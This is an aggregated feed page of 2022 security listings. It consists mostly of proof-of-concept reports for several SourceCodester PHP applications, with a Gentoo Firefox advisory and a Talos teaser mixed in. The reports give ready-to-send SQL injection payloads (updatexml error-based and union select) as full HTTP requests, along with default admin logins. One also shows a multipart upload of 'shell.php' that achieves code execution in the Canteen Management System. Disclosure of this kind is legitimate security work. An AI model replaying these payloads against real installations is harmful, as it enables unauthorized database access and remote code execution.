Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/?page=user/manage\_user&id=

Vulnerability location: /odlms/admin/?page=user/manage\_user&id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/?page=user/manage\_user&id=6%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/?page\=user/manage\_user&id\=6%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43124: Cve_report/SQLi-2.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/tests/manage_test.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/tests/manage\_test.php?id=

Vulnerability location: /odlms/admin/tests/manage\_test.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/tests/manage\_test.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /odlms/admin/tests/manage\_test.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43126: Cve_report/SQLi-1.md at master · vickysuper/Cve_report

Gentoo Linux Security Advisory 202210-34 - Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions less than 102.4.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-34  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: October 31, 2022  
     Bugs: #877773  
       ID: 202210-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Mozilla Firefox, the worst  
of which could result in arbitrary code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 102.4.0:esr          >= 102.4.0:esr  
                                < 106.0:rapid          >= 106.0:rapid  
  2  www-client/firefox-bin     < 102.4.0:esr          >= 102.4.0:esr  
                                < 106.0:rapid          >= 106.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-102.4.0"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-102.4.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-106.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-106.0"

References  
==========

[ 1 ] CVE-2022-42927  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42927  
[ 2 ] CVE-2022-42928  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42928  
[ 3 ] CVE-2022-42929  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42929  
[ 4 ] CVE-2022-42930  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42930  
[ 5 ] CVE-2022-42931  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42931  
[ 6 ] CVE-2022-42932  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42932

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-34

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-34

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_service.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: daytime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_service

Vulnerability location: /php-sms/classes/Master.php?f=delete\_service, id

dbname =sms\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43355: bug_report/SQLi-3.md at main · daytime888/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/manage_request.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: daytime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Execute the following statement to create the "request\_list" table

CREATE TABLE \`request\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /php-sms/admin/?page=orders/manage\_request&id=

Vulnerability location: /php-sms/admin/?page=orders/manage\_request&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=orders/manage\_request&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=orders/manage\_request&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-43354: bug_report/SQLi-2.md at main · daytime888/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: daytime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Execute the following statement to create the "order\_list" table

CREATE TABLE \`order\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /php-sms/admin/?page=orders/view\_order&id=

Vulnerability location: /php-sms/admin/?page=orders/view\_order&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=orders/view\_order&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=orders/view\_order&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-43353: bug_report/SQLi-1.md at main · daytime888/bug_report

Simple Cold Storage Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Simple Cold Storage Management System v1.0 by oretnom23 has SQL injectionBUG_Author: QiaoRui fengLogin account: admin/admin123 (Super Admin account)vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.htmlThe program is built using the xmapp-php8.1 versionVulnerability File: /csms/admin/bookings/update_status.php?id=Vulnerability location: /csms/admin/bookings/update_status.php?id=, iddbname =csms_db,length=7[+] Payload: /csms/admin/bookings/update_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id```sqlGET /csms/admin/bookings/update_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1Host: 192.168.1.88User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0bConnection: close```![image](https://user-images.githubusercontent.com/54017627/191013186-8adc1c41-b13a-4d67-8590-fb6dca6d4a96.png)

Simple Cold Storage Management System 1.0 SQL Injection

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 21 and Oct. 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 21 to October 28

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*# Canteen Management System v1.0 by mayuri\_k has SQL injection

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*

CVE-2022-43232: bug_report/SQLi-2.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/manage_website.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Canteen Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/youthappam/manage\_website.php

Loophole location: Canteen Management System's manage\_website.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /youthappam/manage\_website.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/youthappam/manage\_website.php
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13868104343107
Content-Length: 1811
\-----------------------------13868104343107
Content-Disposition: form-data; name="title"
Admin Panel by 
\-----------------------------13868104343107
Content-Disposition: form-data; name="footer"
Admin PanelÃ�Â 
\-----------------------------13868104343107
Content-Disposition: form-data; name="short\_title"
9090908080
\-----------------------------13868104343107
Content-Disposition: form-data; name="currency\_code"
India
\-----------------------------13868104343107
Content-Disposition: form-data; name="currency\_symbol"
Ã¢â��Â¹
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_website\_image"
shell.php
\-----------------------------13868104343107
Content-Disposition: form-data; name="website\_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_invoice\_image"
logo.jpg
\-----------------------------13868104343107
Content-Disposition: form-data; name="invoice\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_login\_image"
logo.png
\-----------------------------13868104343107
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_back\_login\_image"
logo.jpg
\-----------------------------13868104343107
Content-Disposition: form-data; name="back\_login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="btn\_web"
\-----------------------------13868104343107--

The files will be uploaded to this directory \\youthappam\\assets\\uploadImage\\Logo\\

We visited the directory of the file in the browser and found that the code had been executed

Tag

#firefox